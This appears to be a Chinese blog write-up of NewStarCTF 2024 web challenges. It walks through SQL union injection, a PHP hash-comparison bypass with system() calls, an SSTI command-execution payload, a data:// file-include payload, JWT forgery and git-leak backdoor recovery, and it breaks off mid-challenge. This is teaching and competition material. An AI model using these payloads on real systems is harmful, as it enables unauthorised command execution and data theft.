<pre class="language-json" data-language="json"><code class="language-json"><span class="token punctuation">&#123;</span><span class="token property">"flag"</span><span class="token operator">:</span><span class="token string">"fSkpKcyF9"</span><span class="token punctuation">,</span><span class="token property">"nextLevel"</span><span class="token operator">:</span><span class="token null keyword">null</span><span class="token punctuation">&#125;</span></code></pre>

<pre class="language-php" data-language="php"><code class="language-php">flag<span class="token punctuation">&#123;</span>WA0w<span class="token operator">!</span>_y4_r3al1y_Gr4sP_JJJs<span class="token operator">!</span><span class="token punctuation">&#125;</span></code></pre>

<h4 id="谢谢皮蛋"><a href="#谢谢皮蛋" class="headerlink" title="谢谢皮蛋"></a>谢谢皮蛋</h4><p>源码里提示</p>
<pre class="language-php" data-language="php"><code class="language-php"><span class="token variable">$sql</span><span class="token operator">=</span><span class="token string double-quoted-string">"SELECT uname,position FROM hexo WHERE id=<span class="token interpolation"><span class="token variable">$id</span></span> LIMIT 0,1"</span><span class="token punctuation">;</span>

或许你可以了解下联合注入</code></pre>

<pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token comment"># 检测回显</span>
<span class="token operator">-</span><span class="token number">1</span> <span class="token keyword">union</span> <span class="token keyword">select</span> <span class="token number">1</span><span class="token punctuation">,</span><span class="token number">2</span><span class="token comment">#</span>
<span class="token comment">#查表名 Fl4g,hexo</span>
<span class="token operator">-</span><span class="token number">1</span> <span class="token keyword">union</span> <span class="token keyword">select</span> group_concat<span class="token punctuation">(</span>table_name<span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">2</span> <span class="token keyword">from</span> information_schema<span class="token punctuation">.</span><span class="token keyword">tables</span> <span class="token keyword">where</span> table_schema<span class="token operator">=</span><span class="token keyword">database</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token comment">#</span>
<span class="token comment">#查列名 id,des,value</span>
<span class="token operator">-</span><span class="token number">1</span> <span class="token keyword">union</span> <span class="token keyword">select</span> group_concat<span class="token punctuation">(</span>column_name<span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">2</span> <span class="token keyword">from</span> information_schema<span class="token punctuation">.</span><span class="token keyword">columns</span> <span class="token keyword">where</span> table_name<span class="token operator">=</span><span class="token string">'Fl4g'</span><span class="token comment">#</span>
<span class="token comment">#getflag</span>
<span class="token operator">-</span><span class="token number">1</span> <span class="token keyword">union</span> <span class="token keyword">select</span> des<span class="token punctuation">,</span><span class="token keyword">value</span> <span class="token keyword">from</span> Fl4g<span class="token comment">#</span></code></pre>

<h4 id="PangBai-过家家（1）"><a href="#PangBai-过家家（1）" class="headerlink" title="PangBai 过家家（1）"></a>PangBai 过家家（1）</h4><p><img src="location.png" loading="lazy"></p>
<p>在响应包中发现了Location</p>
<p><strong><code>Location</code></strong> 首部指定的是需要将页面重新定向至的地址。一般在响应码为 3xx 的响应中才会有意义。</p>
<p>于是直接访问，得到了新的cookie解密发现为level2</p>
<p><img src="/2024NewStarCTF/http2.png" loading="lazy"></p>
<p>尝试GET请求ask&#x3D;miao，拿到下一关cookie</p>
<p><img src="/2024NewStarCTF/http3.png" loading="lazy"></p>
<p>加上之前的GET请求后显示 用另一种方法（Method）打声招呼（<code>say=hello</code>）吧 ~ 那就POST请求</p>
<p>来到第四关</p>
<p><img src="/2024NewStarCTF/http4.png" loading="lazy"></p>
<p>修改UA头为<code>User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Papa/20100101 Firefox/46.0</code></p>
<p>你的话语似乎没有对 PangBai 起效，试着说「玛卡巴卡阿卡哇卡米卡玛卡呣」。</p>
<p>修改post内容即可<code>say=玛卡巴卡阿卡哇卡米卡玛卡呣</code></p>
<p><img src="/2024NewStarCTF/http5.png" loading="lazy"></p>
<p>这里便是 PangBai 的心境了呢！试着解开心结吧 ~<br>或许可以尝试用修改（PATCH）的方法提交一个补丁包（name&#x3D;”file”; filename&#x3D;”*.zip”)</p>
<p>后面的不会了 看wp复现的</p>
<p>PATCH 包的格式与 POST 无异，使用 <code>Content-Type: multipart/form-data</code> 发包即可，注意该 Header 的值后面需要加一个 <code>boundary</code> 表示界定符。例如<code>Content-Type: multipart/form-data; boundary=abc</code>，那么在 Body 中，以 <code>--abc</code> 表示一个查询字段的开始，当所有查询字段结束后，用 <code>--abc--</code> 表示结束。</p>
<blockquote>
<p>关于 multipart&#x2F;form-data</p>
<p>这个 Content-Type 下的 Body 字段不需要进行转义，每一个查询内容以一个空行区分元信息和数据（就和 HTTP 报文区分标头和 Body 的那样），如果数据中包含 <code>boundary</code> 界定符的相关内容，可能引起误解，那么可以通过修改 <code>boundary</code> 以规避碰撞情况（因此浏览器发送 <code>mulipart/form-data</code> 的表单时，<code>boundary</code> 往往有很长的 <code>--</code> 并且包含一些长的随机字符串。</p>
</blockquote>
<p>本题只检查文件名后缀是否为 <code>.zip</code>. 因此如此发包即可：</p>
<p>HTTP</p>
<pre class="language-http" data-language="http"><code class="language-http"><span class="token request-line"><span class="token method property">PATCH</span> <span class="token request-target url">/?ask=miao</span> <span class="token http-version property">HTTP/1.1</span></span>
<span class="token header"><span class="token header-name keyword">Host</span><span class="token punctuation">:</span> <span class="token header-value">8.147.132.32:36002</span></span>
<span class="token header"><span class="token header-name keyword">User-Agent</span><span class="token punctuation">:</span> <span class="token header-value">Papa/1.0</span></span>
<span class="token header"><span class="token header-name keyword">Content-Type</span><span class="token punctuation">:</span> <span class="token header-value">multipart/form-data; boundary=abc</span></span>
<span class="token header"><span class="token header-name keyword">Cookie</span><span class="token punctuation">:</span> <span class="token header-value">token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsZXZlbCI6NX0.xKi0JkzaQ0wwYyC3ebBpjuypRYvrYFICU5LSRLnWq_0</span></span>
<span class="token header"><span class="token header-name keyword">Content-Length</span><span class="token punctuation">:</span> <span class="token header-value">168</span></span>

--abc
<span class="token header"><span class="token header-name keyword">Content-Disposition</span><span class="token punctuation">:</span> <span class="token header-value">form-data; name="file"; filename="1.zip"</span></span>

123
--abc
<span class="token header"><span class="token header-name keyword">Content-Disposition</span><span class="token punctuation">:</span> <span class="token header-value">form-data; name="say"</span></span>

玛卡巴卡阿卡哇卡米卡玛卡呣
--abc--</code></pre>

<p>也可以使用脚本</p>
<pre class="language-python" data-language="python"><code class="language-python">
<span class="token keyword">import</span> requests
url <span class="token operator">=</span>
<span class="token string">"http://url/?ask=hello"</span>
headers <span class="token operator">=</span> <span class="token punctuation">&#123;</span>
  <span class="token string">"Host"</span><span class="token punctuation">:</span> <span class="token string">""</span><span class="token punctuation">,</span>
 <span class="token string">"Accept"</span><span class="token punctuation">:</span>
<span class="token string">"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8"</span><span class="token punctuation">,</span>
  <span class="token string">"Accept-Encoding"</span><span class="token punctuation">:</span> <span class="token string">"gzip, deflate"</span><span class="token punctuation">,</span>
  <span class="token string">"Accept-Language"</span><span class="token punctuation">:</span>
<span class="token string">"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"</span><span class="token punctuation">,</span>
  <span class="token string">"Cookie"</span><span class="token punctuation">:</span>
<span class="token string">"token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsZXZlbCI6NX0.H9tHdIUKdnpuotdgpRw4F08nyTIW1kf9f_FTQNS-Dyg"</span><span class="token punctuation">,</span>
  <span class="token string">"Origin"</span><span class="token punctuation">:</span> <span class="token string">"http://localhost"</span><span class="token punctuation">,</span>
  <span class="token string">"Priority"</span><span class="token punctuation">:</span> <span class="token string">"u=0, i"</span><span class="token punctuation">,</span>
  <span class="token string">"Referer"</span><span class="token punctuation">:</span> <span class="token string">"http://localhost"</span><span class="token punctuation">,</span>
  <span class="token string">"User-Agent"</span><span class="token punctuation">:</span> "Papa<span class="token operator">/</span><span class="token number">5.0</span> <span class="token punctuation">(</span>Windows NT <span class="token number">10.0</span><span class="token punctuation">;</span> Win64<span class="token punctuation">;</span> x64<span class="token punctuation">)</span>
AppleWebKit<span class="token operator">/</span><span class="token number">537.36</span> <span class="token punctuation">(</span>KHTML<span class="token punctuation">,</span> like Gecko<span class="token punctuation">)</span> Chrome<span class="token operator">/</span><span class="token number">91.0</span><span class="token number">.4472</span><span class="token number">.77</span> Safari<span class="token operator">/</span><span class="token number">537.36</span>"
<span class="token punctuation">&#125;</span>
file_path <span class="token operator">=</span> <span class="token string">'114514.zip'</span>
data <span class="token operator">=</span> <span class="token punctuation">&#123;</span>
  <span class="token string">'say'</span><span class="token punctuation">:</span> <span class="token string">'玛卡巴卡阿卡哇卡米卡玛卡呣'</span>
<span class="token punctuation">&#125;</span>
files <span class="token operator">=</span> <span class="token punctuation">&#123;</span>
  <span class="token string">'file'</span><span class="token punctuation">:</span> <span class="token punctuation">(</span>file_path<span class="token punctuation">,</span> <span class="token builtin">open</span><span class="token punctuation">(</span>file_path<span class="token punctuation">,</span> <span class="token string">'rb'</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token string">'application/zip'</span><span class="token punctuation">)</span>
<span class="token punctuation">&#125;</span>
response <span class="token operator">=</span>
requests<span class="token punctuation">.</span>request<span class="token punctuation">(</span><span class="token string">"PATCH"</span><span class="token punctuation">,</span> url<span class="token punctuation">,</span> headers<span class="token operator">=</span>headers<span class="token punctuation">,</span> data<span class="token operator">=</span>data<span class="token punctuation">,</span>
files<span class="token operator">=</span>files<span class="token punctuation">)</span>
files<span class="token punctuation">[</span><span class="token string">'file'</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">.</span>close<span class="token punctuation">(</span><span class="token punctuation">)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>response<span class="token punctuation">.</span>text<span class="token punctuation">)</span></code></pre>

<p><img src="/2024NewStarCTF/http6.png" loading="lazy"></p>
<p><strong>X-Forwarded-For: localhost</strong>即可</p>
<p>PangBai 以一种难以形容的表情望着你——激动的、怀念的，却带着些不安与惊恐，像落单后归家的雏鸟，又宛若雷暴中遇难的船员。 你似乎无法抵御这种感觉的萦绕，像是一瞬间被推入到无法言喻的深渊。尽管你尽力摆脱，但即便今后夜间偶见酣眠，这一瞬间塑成的梦魇也成为了美梦的常客。 「像■■■■验体■■不可能■■■■ JWT 这种■■ <strong>Oga0tB4RryevSMSQ</strong> ■■■密钥，除非■■■■■走，难道■■■■■■吗？！」 「……」</p>
<p>这里应该是jwt的密钥 进行加密 修改level为0即可</p>
<p><img src="/2024NewStarCTF/http0.png" loading="lazy"></p>
<h2 id="Week2"><a href="#Week2" class="headerlink" title="Week2"></a>Week2</h2><h3 id="web-1"><a href="#web-1" class="headerlink" title="web"></a>web</h3><h4 id="你能在一秒内打出八句英文吗"><a href="#你能在一秒内打出八句英文吗" class="headerlink" title="你能在一秒内打出八句英文吗"></a>你能在一秒内打出八句英文吗</h4><pre class="language-python" data-language="python"><code class="language-python"><span class="token keyword">import</span> re
<span class="token keyword">import</span> requests

url <span class="token operator">=</span> <span class="token string">"http://eci-2zecn3tukijkr5zsjqtj.cloudeci1.ichunqiu.com/start"</span>
url_post <span class="token operator">=</span> <span class="token string">"http://eci-2zecn3tukijkr5zsjqtj.cloudeci1.ichunqiu.com/submit"</span>
session <span class="token operator">=</span> requests<span class="token punctuation">.</span>session<span class="token punctuation">(</span><span class="token punctuation">)</span>
first_response <span class="token operator">=</span> session<span class="token punctuation">.</span>get<span class="token punctuation">(</span>url<span class="token punctuation">)</span>
payload <span class="token operator">=</span> re<span class="token punctuation">.</span>findall<span class="token punctuation">(</span><span class="token string">r'&lt;p id="text">(.*)&lt;/p>'</span><span class="token punctuation">,</span> first_response<span class="token punctuation">.</span>text<span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>payload<span class="token punctuation">)</span>
data <span class="token operator">=</span> <span class="token punctuation">&#123;</span>
    <span class="token string">'user_input'</span><span class="token punctuation">:</span> <span class="token string-interpolation"><span class="token string">f"</span><span class="token interpolation"><span class="token punctuation">&#123;</span>payload<span class="token punctuation">&#125;</span></span><span class="token string">"</span></span>
<span class="token punctuation">&#125;</span>
response <span class="token operator">=</span> session<span class="token punctuation">.</span>post<span class="token punctuation">(</span>url_post<span class="token punctuation">,</span> data<span class="token operator">=</span>data<span class="token punctuation">)</span>
payload <span class="token operator">=</span> re<span class="token punctuation">.</span>findall<span class="token punctuation">(</span><span class="token string">r'&lt;p id="text">(.*)&lt;/p>'</span><span class="token punctuation">,</span> response<span class="token punctuation">.</span>text<span class="token punctuation">)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>response<span class="token punctuation">.</span>text<span class="token punctuation">)</span>
</code></pre>

<h4 id="遗失的拉链"><a href="#遗失的拉链" class="headerlink" title="遗失的拉链"></a>遗失的拉链</h4><p>根据题目拉链(zip) 可猜测可能在备份文件 扫描可得<code>www.zip</code></p>
<p>piz<a target="_blank" rel="noopener" href="http://www.php/">www.php</a></p>
<pre class="language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token function">error_reporting</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token comment">//for fun</span>
<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token keyword">isset</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'new'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token operator">&amp;&amp;</span><span class="token keyword">isset</span><span class="token punctuation">(</span><span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'star'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
    <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">sha1</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'new'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token operator">===</span><span class="token function">md5</span><span class="token punctuation">(</span><span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'star'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token operator">&amp;&amp;</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'new'</span><span class="token punctuation">]</span><span class="token operator">!==</span><span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'star'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
        <span class="token comment">//欸 为啥sha1和md5相等呢</span>
        <span class="token variable">$cmd</span> <span class="token operator">=</span> <span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'cmd'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
        <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">preg_match</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"/cat|flag/i"</span><span class="token punctuation">,</span> <span class="token variable">$cmd</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
            <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"u can not do this "</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">&#125;</span>
        <span class="token keyword">echo</span> <span class="token keyword">eval</span><span class="token punctuation">(</span><span class="token variable">$cmd</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span><span class="token keyword">else</span><span class="token punctuation">&#123;</span>
        <span class="token keyword">echo</span> <span class="token string double-quoted-string">"Wrong"</span><span class="token punctuation">;</span>

    <span class="token punctuation">&#125;</span> 
<span class="token punctuation">&#125;</span></span></code></pre>

<p>Payload:</p>
<pre class="language-php" data-language="php"><code class="language-php"><span class="token constant">GET</span><span class="token punctuation">:</span> <span class="token operator">?</span><span class="token keyword">new</span><span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token operator">=</span><span class="token number">1</span>
<span class="token constant">POST</span><span class="token punctuation">:</span> star<span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token operator">=</span><span class="token number">2</span><span class="token operator">&amp;</span>cmd<span class="token operator">=</span><span class="token function">system</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'tac /f*'</span><span class="token punctuation">)</span><span class="token punctuation">;</span></code></pre>

<h4 id="谢谢皮蛋-plus"><a href="#谢谢皮蛋-plus" class="headerlink" title="谢谢皮蛋 plus"></a>谢谢皮蛋 plus</h4><p>sql</p>
<h4 id="PangBai-过家家（2）"><a href="#PangBai-过家家（2）" class="headerlink" title="PangBai 过家家（2）"></a>PangBai 过家家（2）</h4><p><strong>任务 1：</strong>清点泄露的文件，找到后门</p>
<p>扫了一下是git泄露</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">githacker <span class="token parameter variable">--url</span> http://eci-2zecn3tukijks5ickqsb.cloudeci1.ichunqiu.com/ <span class="token parameter variable">--output</span> pangbai2
<span class="token function">git</span> log
<span class="token function">git</span> reset <span class="token parameter variable">--hard</span> xxxx</code></pre>

<p><img src="pangbai2_git.png" loading="lazy"></p>
<p>切换了之前分支查看 多了些文件</p>
<p>看了wp后  <code>git stash list</code></p>
<p><img src="pangbai2_stash.png" loading="lazy"></p>
<blockquote>
<p>Stash 的作用</p>
<p>有时会遇到这样的情况，我们正在 dev 分支开发新功能，做到一半时有人过来反馈一个 bug，让马上解决，但是又不方便和现在已经更改的内容混杂在一起，这时就可以使用 <code>git stash</code> 命令先把当前进度保存起来。随后便可以即时处理当前要处理的内容。使用 <code>git stash pop</code> 则可以将之前存储的内容重新恢复到工作区。</p>
<p>又或者，我们已经在一个分支进行了修改，但发现自己修改错了分支，可以通过 Stash 进行存储，然后到其它分支中释放。</p>
<p>一些常见的 Stash 命令如：</p>
<ul>
<li><p><code>git stash</code></p>
<p>保存当前工作进度，会把暂存区和工作区的改动保存起来。执行完这个命令后，在运行 <code>git status</code> 命令，就会发现当前是一个干净的工作区，没有任何改动。使用 <code>git stash save &#39;一些信息&#39;</code> 可以添加一些注释。</p>
</li>
<li><p><code>git stash pop [-index] [stash_id]</code></p>
<p>从 Stash 中释放内容，默认为恢复最新的内容到工作区。</p>
</li>
</ul>
</blockquote>
<p>使用 <code>git stash pop</code> 恢复后门文件到工作区。</p>
<p>BacKd0or.v2d23AOPpDfEW5Ca.php</p>
<pre class="language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>

<span class="token comment"># Functions to handle HTML output</span>

<span class="token keyword">function</span> <span class="token function-definition function">print_msg</span><span class="token punctuation">(</span><span class="token variable">$msg</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
    <span class="token variable">$content</span> <span class="token operator">=</span> <span class="token function">file_get_contents</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'index.html'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token variable">$content</span> <span class="token operator">=</span> <span class="token function">preg_replace</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'/\s*&lt;script.*&lt;\/script>/s'</span><span class="token punctuation">,</span> <span class="token string single-quoted-string">''</span><span class="token punctuation">,</span> <span class="token variable">$content</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token variable">$content</span> <span class="token operator">=</span> <span class="token function">preg_replace</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'/ event/'</span><span class="token punctuation">,</span> <span class="token string single-quoted-string">''</span><span class="token punctuation">,</span> <span class="token variable">$content</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token variable">$content</span> <span class="token operator">=</span> <span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'点击此处载入存档'</span><span class="token punctuation">,</span> <span class="token variable">$msg</span><span class="token punctuation">,</span> <span class="token variable">$content</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">echo</span> <span class="token variable">$content</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

<span class="token keyword">function</span> <span class="token function-definition function">show_backdoor</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
    <span class="token variable">$content</span> <span class="token operator">=</span> <span class="token function">file_get_contents</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'index.html'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token variable">$content</span> <span class="token operator">=</span> <span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'/assets/index.4f73d116116831ef.js'</span><span class="token punctuation">,</span> <span class="token string single-quoted-string">'/assets/backdoor.5b55c904b31db48d.js'</span><span class="token punctuation">,</span> <span class="token variable">$content</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">echo</span> <span class="token variable">$content</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

<span class="token comment"># Backdoor</span>

<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'papa'</span><span class="token punctuation">]</span> <span class="token operator">!==</span> <span class="token string single-quoted-string">'TfflxoU0ry7c'</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
    <span class="token function">show_backdoor</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span> <span class="token keyword">else</span> <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'NewStar_CTF.2024'</span><span class="token punctuation">]</span> <span class="token operator">!==</span> <span class="token string single-quoted-string">'Welcome'</span> <span class="token operator">&amp;&amp;</span> <span class="token function">preg_match</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'/^Welcome$/'</span><span class="token punctuation">,</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'NewStar_CTF.2024'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
    <span class="token function">print_msg</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'PangBai loves you!'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">call_user_func</span><span class="token punctuation">(</span><span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'func'</span><span class="token punctuation">]</span><span class="token punctuation">,</span> <span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'args'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span> <span class="token keyword">else</span> <span class="token punctuation">&#123;</span>
    <span class="token function">print_msg</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'PangBai hates you!'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span></span></code></pre>

<p>对于这个表达式，可以使用换行符绕过。<code>preg_match</code> 默认为单行模式（此时 <code>.</code> 会匹配换行符），但在 PHP 中的该模式下，<code>$</code> 除了匹配整个字符串的结尾，还能够匹配字符串最后一个换行符。</p>
<pre class="language-php" data-language="php"><code class="language-php"><span class="token constant">GET</span><span class="token punctuation">:</span> <span class="token operator">?</span>NewStar<span class="token punctuation">[</span><span class="token constant">CTF</span><span class="token number">.2024</span><span class="token operator">=</span>Welcome<span class="token operator">%</span><span class="token number">0</span>a
<span class="token constant">POST</span><span class="token punctuation">:</span> papa<span class="token operator">=</span>TfflxoU0ry7c<span class="token operator">&amp;</span>func<span class="token operator">=</span>system<span class="token operator">&amp;</span>args<span class="token operator">=</span>set</code></pre>

<h4 id="复读机"><a href="#复读机" class="headerlink" title="复读机"></a>复读机</h4><p>ssti fenjing一把梭</p>
<pre class="language-python" data-language="python"><code class="language-python">python <span class="token operator">-</span>m fenjing crack <span class="token operator">-</span><span class="token operator">-</span>url http<span class="token punctuation">:</span><span class="token operator">//</span>eci<span class="token operator">-</span>2ze7rlqz56xnra7t93ja<span class="token punctuation">.</span>cloudeci1<span class="token punctuation">.</span>ichunqiu<span class="token punctuation">.</span>com<span class="token operator">/</span> <span class="token operator">-</span><span class="token operator">-</span>method POST <span class="token operator">-</span><span class="token operator">-</span>inputs user_input
Payload<span class="token punctuation">:</span>
<span class="token punctuation">&#123;</span><span class="token punctuation">&#123;</span>cycler<span class="token punctuation">.</span><span class="token builtin">next</span><span class="token punctuation">.</span>__globals__<span class="token punctuation">.</span>__builtins__<span class="token punctuation">.</span><span class="token builtin">__import__</span><span class="token punctuation">(</span><span class="token string">'os'</span><span class="token punctuation">)</span><span class="token punctuation">.</span>popen<span class="token punctuation">(</span><span class="token string">'tac /flag'</span><span class="token punctuation">)</span><span class="token punctuation">.</span>read<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">&#125;</span><span class="token punctuation">&#125;</span></code></pre>

<h2 id="Week3"><a href="#Week3" class="headerlink" title="Week3"></a>Week3</h2><h3 id="web-2"><a href="#web-2" class="headerlink" title="web"></a>web</h3><h4 id="Include-Me"><a href="#Include-Me" class="headerlink" title="Include Me"></a>Include Me</h4><pre class="language-php" data-language="php"><code class="language-php"> <span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token function">highlight_file</span><span class="token punctuation">(</span><span class="token constant">__FILE__</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">function</span> <span class="token function-definition function">waf</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
    <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">preg_match</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"/&lt;|\?|php|>|echo|filter|flag|system|file|%|&amp;|=|`|eval/i"</span><span class="token punctuation">,</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'me'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
        <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"兄弟你别包"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>
<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token keyword">isset</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'phpinfo'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
    <span class="token function">phpinfo</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

<span class="token comment">//兄弟你知道了吗？</span>
<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token operator">!</span><span class="token keyword">isset</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'iknow'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
    <span class="token function">header</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"Refresh: 5;url=https://cn.bing.com/search?q=php%E4%BC%AA%E5%8D%8F%E8%AE%AE"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

<span class="token function">waf</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">include</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'me'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token string double-quoted-string">"兄弟你好香"</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span>
</code></pre>

<p>关键过滤了 <code>php</code> <code>&gt;</code> <code>?</code> <code>=</code> 导致无法使用php伪协议 可以使用data伪协议 但是转为base64 需要巧妙设计避开<code>=</code> 以及不需要后面的<code>?&gt;</code>闭合 </p>
<p>Payload:</p>
<pre class="language-php" data-language="php"><code class="language-php"><span class="token constant">GET</span><span class="token punctuation">:</span> <span class="token operator">?</span>me<span class="token operator">=</span>data<span class="token punctuation">:</span><span class="token comment">//text/plain;base64,PD9waHAgc3lzdGVtKCJzb3J0IC9mbGFnIik7</span></code></pre>

<h4 id="臭皮踩踩背"><a href="#臭皮踩踩背" class="headerlink" title="臭皮踩踩背"></a>臭皮踩踩背</h4><pre class="language-python" data-language="python"><code class="language-python">你被豌豆关在一个监狱里，，，，，，
豌豆百密一疏，不小心遗漏了一些东西，，，
<span class="token keyword">def</span> <span class="token function">ev4l</span><span class="token punctuation">(</span><span class="token operator">*</span>args<span class="token punctuation">)</span><span class="token punctuation">:</span>
	<span class="token keyword">print</span><span class="token punctuation">(</span>secret<span class="token punctuation">)</span>
inp <span class="token operator">=</span> <span class="token builtin">input</span><span class="token punctuation">(</span><span class="token string">"> "</span><span class="token punctuation">)</span>
f <span class="token operator">=</span> <span class="token keyword">lambda</span><span class="token punctuation">:</span> <span class="token boolean">None</span>
